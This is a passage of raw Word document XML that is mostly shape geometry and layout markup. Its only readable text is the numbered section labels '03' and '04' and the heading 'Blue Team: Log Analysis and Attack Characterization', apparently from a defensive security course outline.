                                <w:t>03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458F95" id="Group 132" o:spid="_x0000_s1038" style="position:absolute;margin-left:36pt;margin-top:148.3pt;width:61.2pt;height:48.95pt;z-index:-15723008;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="720,2966" coordsize="1224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">
                <v:shape id="Freeform 134" o:spid="_x0000_s1039" style="position:absolute;left:719;top:2965;width:1224;height:979;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1224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" path="m1223,508l1095,393r,-230l1092,131,1068,72,1023,27,964,3,932,,163,,100,12,48,47,13,99,,163,,815r13,63l48,930r52,35l163,978r769,l996,965r51,-35l1082,878r13,-63l1095,624,1223,508xe" fillcolor="#3d85c6" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1223,3474;1095,3359;1095,3129;1092,3097;1068,3038;1023,2993;964,2969;932,2966;163,2966;100,2978;48,3013;13,3065;0,3129;0,3781;13,3844;48,3896;100,3931;163,3944;932,3944;996,3931;1047,3896;1082,3844;1095,3781;1095,3590;1223,3474" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 133" o:spid="_x0000_s1040" type="#_x0000_t202" style="position:absolute;left:720;top:2965;width:1224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5EDF2E8E" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:before="76"/>
                          <w:ind w:left="219"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Roboto"/>
                            <w:sz w:val="60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60"/>
                          </w:rPr>
                          <w:t>03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DA1FAC1" wp14:editId="0DBA300C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1352550</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1883410</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7517130" cy="621665"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="13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17130" cy="621665"/>
                          <a:chOff x="2130" y="2966"/>
                          <a:chExt cx="11838" cy="979"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="140" name="Freeform 131"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="2130" y="2965"/>
                            <a:ext cx="11838" cy="979"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 13805 2130"/>
                              <a:gd name="T1" fmla="*/ T0 w 11838"/>
                              <a:gd name="T2" fmla="+- 0 3944 2966"/>
                              <a:gd name="T3" fmla="*/ 3944 h 979"/>
                              <a:gd name="T4" fmla="+- 0 2293 2130"/>
                              <a:gd name="T5" fmla="*/ T4 w 11838"/>
                              <a:gd name="T6" fmla="+- 0 3944 2966"/>
                              <a:gd name="T7" fmla="*/ 3944 h 979"/>
                              <a:gd name="T8" fmla="+- 0 2230 2130"/>
                              <a:gd name="T9" fmla="*/ T8 w 11838"/>
                              <a:gd name="T10" fmla="+- 0 3931 2966"/>
                              <a:gd name="T11" fmla="*/ 3931 h 979"/>
                              <a:gd name="T12" fmla="+- 0 2178 2130"/>
                              <a:gd name="T13" fmla="*/ T12 w 11838"/>
                              <a:gd name="T14" fmla="+- 0 3896 2966"/>
                              <a:gd name="T15" fmla="*/ 3896 h 979"/>
                              <a:gd name="T16" fmla="+- 0 2143 2130"/>
                              <a:gd name="T17" fmla="*/ T16 w 11838"/>
                              <a:gd name="T18" fmla="+- 0 3844 2966"/>
                              <a:gd name="T19" fmla="*/ 3844 h 979"/>
                              <a:gd name="T20" fmla="+- 0 2130 2130"/>
                              <a:gd name="T21" fmla="*/ T20 w 11838"/>
                              <a:gd name="T22" fmla="+- 0 3781 2966"/>
                              <a:gd name="T23" fmla="*/ 3781 h 979"/>
                              <a:gd name="T24" fmla="+- 0 2130 2130"/>
                              <a:gd name="T25" fmla="*/ T24 w 11838"/>
                              <a:gd name="T26" fmla="+- 0 3129 2966"/>
                              <a:gd name="T27" fmla="*/ 3129 h 979"/>
                              <a:gd name="T28" fmla="+- 0 2143 2130"/>
                              <a:gd name="T29" fmla="*/ T28 w 11838"/>
                              <a:gd name="T30" fmla="+- 0 3065 2966"/>
                              <a:gd name="T31" fmla="*/ 3065 h 979"/>
                              <a:gd name="T32" fmla="+- 0 2178 2130"/>
                              <a:gd name="T33" fmla="*/ T32 w 11838"/>
                              <a:gd name="T34" fmla="+- 0 3013 2966"/>
                              <a:gd name="T35" fmla="*/ 3013 h 979"/>
                              <a:gd name="T36" fmla="+- 0 2230 2130"/>
                              <a:gd name="T37" fmla="*/ T36 w 11838"/>
                              <a:gd name="T38" fmla="+- 0 2978 2966"/>
                              <a:gd name="T39" fmla="*/ 2978 h 979"/>
                              <a:gd name="T40" fmla="+- 0 2293 2130"/>
                              <a:gd name="T41" fmla="*/ T40 w 11838"/>
                              <a:gd name="T42" fmla="+- 0 2966 2966"/>
                              <a:gd name="T43" fmla="*/ 2966 h 979"/>
                              <a:gd name="T44" fmla="+- 0 13805 2130"/>
                              <a:gd name="T45" fmla="*/ T44 w 11838"/>
                              <a:gd name="T46" fmla="+- 0 2966 2966"/>
                              <a:gd name="T47" fmla="*/ 2966 h 979"/>
                              <a:gd name="T48" fmla="+- 0 13867 2130"/>
                              <a:gd name="T49" fmla="*/ T48 w 11838"/>
                              <a:gd name="T50" fmla="+- 0 2978 2966"/>
                              <a:gd name="T51" fmla="*/ 2978 h 979"/>
                              <a:gd name="T52" fmla="+- 0 13920 2130"/>
                              <a:gd name="T53" fmla="*/ T52 w 11838"/>
                              <a:gd name="T54" fmla="+- 0 3013 2966"/>
                              <a:gd name="T55" fmla="*/ 3013 h 979"/>
                              <a:gd name="T56" fmla="+- 0 13956 2130"/>
                              <a:gd name="T57" fmla="*/ T56 w 11838"/>
                              <a:gd name="T58" fmla="+- 0 3066 2966"/>
                              <a:gd name="T59" fmla="*/ 3066 h 979"/>
                              <a:gd name="T60" fmla="+- 0 13968 2130"/>
                              <a:gd name="T61" fmla="*/ T60 w 11838"/>
                              <a:gd name="T62" fmla="+- 0 3129 2966"/>
                              <a:gd name="T63" fmla="*/ 3129 h 979"/>
                              <a:gd name="T64" fmla="+- 0 13968 2130"/>
                              <a:gd name="T65" fmla="*/ T64 w 11838"/>
                              <a:gd name="T66" fmla="+- 0 3781 2966"/>
                              <a:gd name="T67" fmla="*/ 3781 h 979"/>
                              <a:gd name="T68" fmla="+- 0 13955 2130"/>
                              <a:gd name="T69" fmla="*/ T68 w 11838"/>
                              <a:gd name="T70" fmla="+- 0 3844 2966"/>
                              <a:gd name="T71" fmla="*/ 3844 h 979"/>
                              <a:gd name="T72" fmla="+- 0 13920 2130"/>
                              <a:gd name="T73" fmla="*/ T72 w 11838"/>
                              <a:gd name="T74" fmla="+- 0 3896 2966"/>
                              <a:gd name="T75" fmla="*/ 3896 h 979"/>
                              <a:gd name="T76" fmla="+- 0 13868 2130"/>
                              <a:gd name="T77" fmla="*/ T76 w 11838"/>
                              <a:gd name="T78" fmla="+- 0 3931 2966"/>
                              <a:gd name="T79" fmla="*/ 3931 h 979"/>
                              <a:gd name="T80" fmla="+- 0 13805 2130"/>
                              <a:gd name="T81" fmla="*/ T80 w 11838"/>
                              <a:gd name="T82" fmla="+- 0 3944 2966"/>
                              <a:gd name="T83" fmla="*/ 3944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838" h="979">
                                <a:moveTo>
                                  <a:pt x="11675" y="978"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="163" y="978"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="100" y="965"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="48" y="930"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13" y="878"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="815"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="163"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13" y="99"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="48" y="47"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="100" y="12"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="163" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11675" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11737" y="12"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11790" y="47"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11826" y="100"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11838" y="163"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11838" y="815"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11825" y="878"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11790" y="930"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11738" y="965"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11675" y="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2130" y="2965"/>
                            <a:ext cx="11838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329B6B" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:before="234"/>
                                <w:ind w:left="31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36"/>
                                </w:rPr>
                                <w:t>Blue Team</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="36"/>
                                </w:rPr>
                                <w:t>: Log Analysis and Attack Characterization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A1FAC1" id="Group 129" o:spid="_x0000_s1041" style="position:absolute;margin-left:106.5pt;margin-top:148.3pt;width:591.9pt;height:48.95pt;z-index:-15721984;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="2130,2966" coordsize="11838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">
                <v:shape id="Freeform 131" o:spid="_x0000_s1042" style="position:absolute;left:2130;top:2965;width:11838;height:979;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="11838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" path="m11675,978l163,978,100,965,48,930,13,878,,815,,163,13,99,48,47,100,12,163,,11675,r62,12l11790,47r36,53l11838,163r,652l11825,878r-35,52l11738,965r-63,13xe" fillcolor="#f2f2f2" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="11675,3944;163,3944;100,3931;48,3896;13,3844;0,3781;0,3129;13,3065;48,3013;100,2978;163,2966;11675,2966;11737,2978;11790,3013;11826,3066;11838,3129;11838,3781;11825,3844;11790,3896;11738,3931;11675,3944" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 130" o:spid="_x0000_s1043" type="#_x0000_t202" style="position:absolute;left:2130;top:2965;width:11838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1C329B6B" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:before="234"/>
                          <w:ind w:left="315"/>
                          <w:rPr>
                            <w:sz w:val="36"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Roboto"/>
                            <w:b/>
                            <w:sz w:val="36"/>
                          </w:rPr>
                          <w:t>Blue Team</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:sz w:val="36"/>
                          </w:rPr>
                          <w:t>: Log Analysis and Attack Characterization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7A1D9DB8" wp14:editId="4DC5D777">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>457200</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2733040</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="777240" cy="621665"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="13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" cy="621665"/>
                          <a:chOff x="720" y="4304"/>
                          <a:chExt cx="1224" cy="979"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="137" name="Freeform 128"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="719" y="4303"/>
                            <a:ext cx="1224" cy="979"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 1943 720"/>
                              <a:gd name="T1" fmla="*/ T0 w 1224"/>
                              <a:gd name="T2" fmla="+- 0 4813 4304"/>
                              <a:gd name="T3" fmla="*/ 4813 h 979"/>
                              <a:gd name="T4" fmla="+- 0 1815 720"/>
                              <a:gd name="T5" fmla="*/ T4 w 1224"/>
                              <a:gd name="T6" fmla="+- 0 4697 4304"/>
                              <a:gd name="T7" fmla="*/ 4697 h 979"/>
                              <a:gd name="T8" fmla="+- 0 1815 720"/>
                              <a:gd name="T9" fmla="*/ T8 w 1224"/>
                              <a:gd name="T10" fmla="+- 0 4467 4304"/>
                              <a:gd name="T11" fmla="*/ 4467 h 979"/>
                              <a:gd name="T12" fmla="+- 0 1812 720"/>
                              <a:gd name="T13" fmla="*/ T12 w 1224"/>
                              <a:gd name="T14" fmla="+- 0 4435 4304"/>
                              <a:gd name="T15" fmla="*/ 4435 h 979"/>
                              <a:gd name="T16" fmla="+- 0 1788 720"/>
                              <a:gd name="T17" fmla="*/ T16 w 1224"/>
                              <a:gd name="T18" fmla="+- 0 4377 4304"/>
                              <a:gd name="T19" fmla="*/ 4377 h 979"/>
                              <a:gd name="T20" fmla="+- 0 1743 720"/>
                              <a:gd name="T21" fmla="*/ T20 w 1224"/>
                              <a:gd name="T22" fmla="+- 0 4331 4304"/>
                              <a:gd name="T23" fmla="*/ 4331 h 979"/>
                              <a:gd name="T24" fmla="+- 0 1684 720"/>
                              <a:gd name="T25" fmla="*/ T24 w 1224"/>
                              <a:gd name="T26" fmla="+- 0 4307 4304"/>
                              <a:gd name="T27" fmla="*/ 4307 h 979"/>
                              <a:gd name="T28" fmla="+- 0 1652 720"/>
                              <a:gd name="T29" fmla="*/ T28 w 1224"/>
                              <a:gd name="T30" fmla="+- 0 4304 4304"/>
                              <a:gd name="T31" fmla="*/ 4304 h 979"/>
                              <a:gd name="T32" fmla="+- 0 883 720"/>
                              <a:gd name="T33" fmla="*/ T32 w 1224"/>
                              <a:gd name="T34" fmla="+- 0 4304 4304"/>
                              <a:gd name="T35" fmla="*/ 4304 h 979"/>
                              <a:gd name="T36" fmla="+- 0 820 720"/>
                              <a:gd name="T37" fmla="*/ T36 w 1224"/>
                              <a:gd name="T38" fmla="+- 0 4317 4304"/>
                              <a:gd name="T39" fmla="*/ 4317 h 979"/>
                              <a:gd name="T40" fmla="+- 0 768 720"/>
                              <a:gd name="T41" fmla="*/ T40 w 1224"/>
                              <a:gd name="T42" fmla="+- 0 4352 4304"/>
                              <a:gd name="T43" fmla="*/ 4352 h 979"/>
                              <a:gd name="T44" fmla="+- 0 733 720"/>
                              <a:gd name="T45" fmla="*/ T44 w 1224"/>
                              <a:gd name="T46" fmla="+- 0 4404 4304"/>
                              <a:gd name="T47" fmla="*/ 4404 h 979"/>
                              <a:gd name="T48" fmla="+- 0 720 720"/>
                              <a:gd name="T49" fmla="*/ T48 w 1224"/>
                              <a:gd name="T50" fmla="+- 0 4467 4304"/>
                              <a:gd name="T51" fmla="*/ 4467 h 979"/>
                              <a:gd name="T52" fmla="+- 0 720 720"/>
                              <a:gd name="T53" fmla="*/ T52 w 1224"/>
                              <a:gd name="T54" fmla="+- 0 5119 4304"/>
                              <a:gd name="T55" fmla="*/ 5119 h 979"/>
                              <a:gd name="T56" fmla="+- 0 733 720"/>
                              <a:gd name="T57" fmla="*/ T56 w 1224"/>
                              <a:gd name="T58" fmla="+- 0 5183 4304"/>
                              <a:gd name="T59" fmla="*/ 5183 h 979"/>
                              <a:gd name="T60" fmla="+- 0 768 720"/>
                              <a:gd name="T61" fmla="*/ T60 w 1224"/>
                              <a:gd name="T62" fmla="+- 0 5235 4304"/>
                              <a:gd name="T63" fmla="*/ 5235 h 979"/>
                              <a:gd name="T64" fmla="+- 0 820 720"/>
                              <a:gd name="T65" fmla="*/ T64 w 1224"/>
                              <a:gd name="T66" fmla="+- 0 5270 4304"/>
                              <a:gd name="T67" fmla="*/ 5270 h 979"/>
                              <a:gd name="T68" fmla="+- 0 883 720"/>
                              <a:gd name="T69" fmla="*/ T68 w 1224"/>
                              <a:gd name="T70" fmla="+- 0 5282 4304"/>
                              <a:gd name="T71" fmla="*/ 5282 h 979"/>
                              <a:gd name="T72" fmla="+- 0 1652 720"/>
                              <a:gd name="T73" fmla="*/ T72 w 1224"/>
                              <a:gd name="T74" fmla="+- 0 5282 4304"/>
                              <a:gd name="T75" fmla="*/ 5282 h 979"/>
                              <a:gd name="T76" fmla="+- 0 1716 720"/>
                              <a:gd name="T77" fmla="*/ T76 w 1224"/>
                              <a:gd name="T78" fmla="+- 0 5270 4304"/>
                              <a:gd name="T79" fmla="*/ 5270 h 979"/>
                              <a:gd name="T80" fmla="+- 0 1767 720"/>
                              <a:gd name="T81" fmla="*/ T80 w 1224"/>
                              <a:gd name="T82" fmla="+- 0 5235 4304"/>
                              <a:gd name="T83" fmla="*/ 5235 h 979"/>
                              <a:gd name="T84" fmla="+- 0 1802 720"/>
                              <a:gd name="T85" fmla="*/ T84 w 1224"/>
                              <a:gd name="T86" fmla="+- 0 5183 4304"/>
                              <a:gd name="T87" fmla="*/ 5183 h 979"/>
                              <a:gd name="T88" fmla="+- 0 1815 720"/>
                              <a:gd name="T89" fmla="*/ T88 w 1224"/>
                              <a:gd name="T90" fmla="+- 0 5119 4304"/>
                              <a:gd name="T91" fmla="*/ 5119 h 979"/>
                              <a:gd name="T92" fmla="+- 0 1815 720"/>
                              <a:gd name="T93" fmla="*/ T92 w 1224"/>
                              <a:gd name="T94" fmla="+- 0 4929 4304"/>
                              <a:gd name="T95" fmla="*/ 4929 h 979"/>
                              <a:gd name="T96" fmla="+- 0 1943 720"/>
                              <a:gd name="T97" fmla="*/ T96 w 1224"/>
                              <a:gd name="T98" fmla="+- 0 4813 4304"/>
                              <a:gd name="T99" fmla="*/ 4813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24" h="979">
                                <a:moveTo>
                                  <a:pt x="1223" y="509"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1095" y="393"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1095" y="163"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1092" y="131"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1068" y="73"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1023" y="27"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="964" y="3"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="932" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="163" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="100" y="13"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="48" y="48"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13" y="100"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="163"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="815"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13" y="879"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="48" y="931"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="100" y="966"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="163" y="978"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="932" y="978"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="996" y="966"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1047" y="931"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1082" y="879"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1095" y="815"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1095" y="625"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1223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4303"/>
                            <a:ext cx="1224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F3379" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:before="76"/>
                                <w:ind w:left="219"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Roboto"/>
                                  <w:sz w:val="60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60"/>
                                </w:rPr>
                                <w:t>04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1D9DB8" id="Group 126" o:spid="_x0000_s1044" style="position:absolute;margin-left:36pt;margin-top:215.2pt;width:61.2pt;height:48.95pt;z-index:-15720960;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="720,4304" coordsize="1224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">
                <v:shape id="Freeform 128" o:spid="_x0000_s1045" style="position:absolute;left:719;top:4303;width:1224;height:979;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1224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" path="m1223,509l1095,393r,-230l1092,131,1068,73,1023,27,964,3,932,,163,,100,13,48,48,13,100,,163,,815r13,64l48,931r52,35l163,978r769,l996,966r51,-35l1082,879r13,-64l1095,625,1223,509xe" fillcolor="black" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1223,4813;1095,4697;1095,4467;1092,4435;1068,4377;1023,4331;964,4307;932,4304;163,4304;100,4317;48,4352;13,4404;0,4467;0,5119;13,5183;48,5235;100,5270;163,5282;932,5282;996,5270;1047,5235;1082,5183;1095,5119;1095,4929;1223,4813" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 127" o:spid="_x0000_s1046" type="#_x0000_t202" style="position:absolute;left:720;top:4303;width:1224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5F4F3379" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:before="76"/>
                          <w:ind w:left="219"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Roboto"/>
                            <w:sz w:val="60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60"/>
                          </w:rPr>
                          <w:t>04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D38935A" wp14:editId="6843DCC7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1352550</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2727960</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7517130" cy="621665"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="13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17130" cy="621665"/>
                          <a:chOff x="2130" y="4296"/>
                          <a:chExt cx="11838" cy="979"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="134" name="Freeform 125"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="2130" y="4296"/>
                            <a:ext cx="11838" cy="979"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 13805 2130"/>
                              <a:gd name="T1" fmla="*/ T0 w 11838"/>
                              <a:gd name="T2" fmla="+- 0 5275 4296"/>
                              <a:gd name="T3" fmla="*/ 5275 h 979"/>
                              <a:gd name="T4" fmla="+- 0 2293 2130"/>
                              <a:gd name="T5" fmla="*/ T4 w 11838"/>
                              <a:gd name="T6" fmla="+- 0 5275 4296"/>
                              <a:gd name="T7" fmla="*/ 5275 h 979"/>
                              <a:gd name="T8" fmla="+- 0 2230 2130"/>
                              <a:gd name="T9" fmla="*/ T8 w 11838"/>
                              <a:gd name="T10" fmla="+- 0 5262 4296"/>
                              <a:gd name="T11" fmla="*/ 5262 h 979"/>
                              <a:gd name="T12" fmla="+- 0 2178 2130"/>
                              <a:gd name="T13" fmla="*/ T12 w 11838"/>
                              <a:gd name="T14" fmla="+- 0 5227 4296"/>
                              <a:gd name="T15" fmla="*/ 5227 h 979"/>
                              <a:gd name="T16" fmla="+- 0 2143 2130"/>
                              <a:gd name="T17" fmla="*/ T16 w 11838"/>
                              <a:gd name="T18" fmla="+- 0 5175 4296"/>
                              <a:gd name="T19" fmla="*/ 5175 h 979"/>
                              <a:gd name="T20" fmla="+- 0 2130 2130"/>
                              <a:gd name="T21" fmla="*/ T20 w 11838"/>
                              <a:gd name="T22" fmla="+- 0 5112 4296"/>
                              <a:gd name="T23" fmla="*/ 5112 h 979"/>
                              <a:gd name="T24" fmla="+- 0 2130 2130"/>
                              <a:gd name="T25" fmla="*/ T24 w 11838"/>
                              <a:gd name="T26" fmla="+- 0 4460 4296"/>
                              <a:gd name="T27" fmla="*/ 4460 h 979"/>
                              <a:gd name="T28" fmla="+- 0 2143 2130"/>
                              <a:gd name="T29" fmla="*/ T28 w 11838"/>
                              <a:gd name="T30" fmla="+- 0 4396 4296"/>
                              <a:gd name="T31" fmla="*/ 4396 h 979"/>
                              <a:gd name="T32" fmla="+- 0 2178 2130"/>
                              <a:gd name="T33" fmla="*/ T32 w 11838"/>
                              <a:gd name="T34" fmla="+- 0 4344 4296"/>
                              <a:gd name="T35" fmla="*/ 4344 h 979"/>
                              <a:gd name="T36" fmla="+- 0 2230 2130"/>
                              <a:gd name="T37" fmla="*/ T36 w 11838"/>
                              <a:gd name="T38" fmla="+- 0 4309 4296"/>
                              <a:gd name="T39" fmla="*/ 4309 h 979"/>
                              <a:gd name="T40" fmla="+- 0 2293 2130"/>
                              <a:gd name="T41" fmla="*/ T40 w 11838"/>
                              <a:gd name="T42" fmla="+- 0 4296 4296"/>
                              <a:gd name="T43" fmla="*/ 4296 h 979"/>
                              <a:gd name="T44" fmla="+- 0 13805 2130"/>
                              <a:gd name="T45" fmla="*/ T44 w 11838"/>
                              <a:gd name="T46" fmla="+- 0 4296 4296"/>
                              <a:gd name="T47" fmla="*/ 4296 h 979"/>
                              <a:gd name="T48" fmla="+- 0 13867 2130"/>
                              <a:gd name="T49" fmla="*/ T48 w 11838"/>
                              <a:gd name="T50" fmla="+- 0 4309 4296"/>
                              <a:gd name="T51" fmla="*/ 4309 h 979"/>
                              <a:gd name="T52" fmla="+- 0 13920 2130"/>
                              <a:gd name="T53" fmla="*/ T52 w 11838"/>
                              <a:gd name="T54" fmla="+- 0 4344 4296"/>
                              <a:gd name="T55" fmla="*/ 4344 h 979"/>
                              <a:gd name="T56" fmla="+- 0 13956 2130"/>
                              <a:gd name="T57" fmla="*/ T56 w 11838"/>
                              <a:gd name="T58" fmla="+- 0 4397 4296"/>
                              <a:gd name="T59" fmla="*/ 4397 h 979"/>
                              <a:gd name="T60" fmla="+- 0 13968 2130"/>
                              <a:gd name="T61" fmla="*/ T60 w 11838"/>
                              <a:gd name="T62" fmla="+- 0 4460 4296"/>
                              <a:gd name="T63" fmla="*/ 4460 h 979"/>
                              <a:gd name="T64" fmla="+- 0 13968 2130"/>
                              <a:gd name="T65" fmla="*/ T64 w 11838"/>
                              <a:gd name="T66" fmla="+- 0 5112 4296"/>
                              <a:gd name="T67" fmla="*/ 5112 h 979"/>
                              <a:gd name="T68" fmla="+- 0 13955 2130"/>
                              <a:gd name="T69" fmla="*/ T68 w 11838"/>
                              <a:gd name="T70" fmla="+- 0 5175 4296"/>
                              <a:gd name="T71" fmla="*/ 5175 h 979"/>
                              <a:gd name="T72" fmla="+- 0 13920 2130"/>
                              <a:gd name="T73" fmla="*/ T72 w 11838"/>
                              <a:gd name="T74" fmla="+- 0 5227 4296"/>
                              <a:gd name="T75" fmla="*/ 5227 h 979"/>
                              <a:gd name="T76" fmla="+- 0 13868 2130"/>
                              <a:gd name="T77" fmla="*/ T76 w 11838"/>
                              <a:gd name="T78" fmla="+- 0 5262 4296"/>
                              <a:gd name="T79" fmla="*/ 5262 h 979"/>
                              <a:gd name="T80" fmla="+- 0 13805 2130"/>
                              <a:gd name="T81" fmla="*/ T80 w 11838"/>
                              <a:gd name="T82" fmla="+- 0 5275 4296"/>
                              <a:gd name="T83" fmla="*/ 5275 h 9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838" h="979">
                                <a:moveTo>
                                  <a:pt x="11675" y="979"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="163" y="979"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="100" y="966"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="48" y="931"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13" y="879"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="816"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="164"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13" y="100"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="48" y="48"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="100" y="13"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="163" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11675" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11737" y="13"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11790" y="48"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11826" y="101"/>
                                </a:lnTo>
                                <a:lnTo>
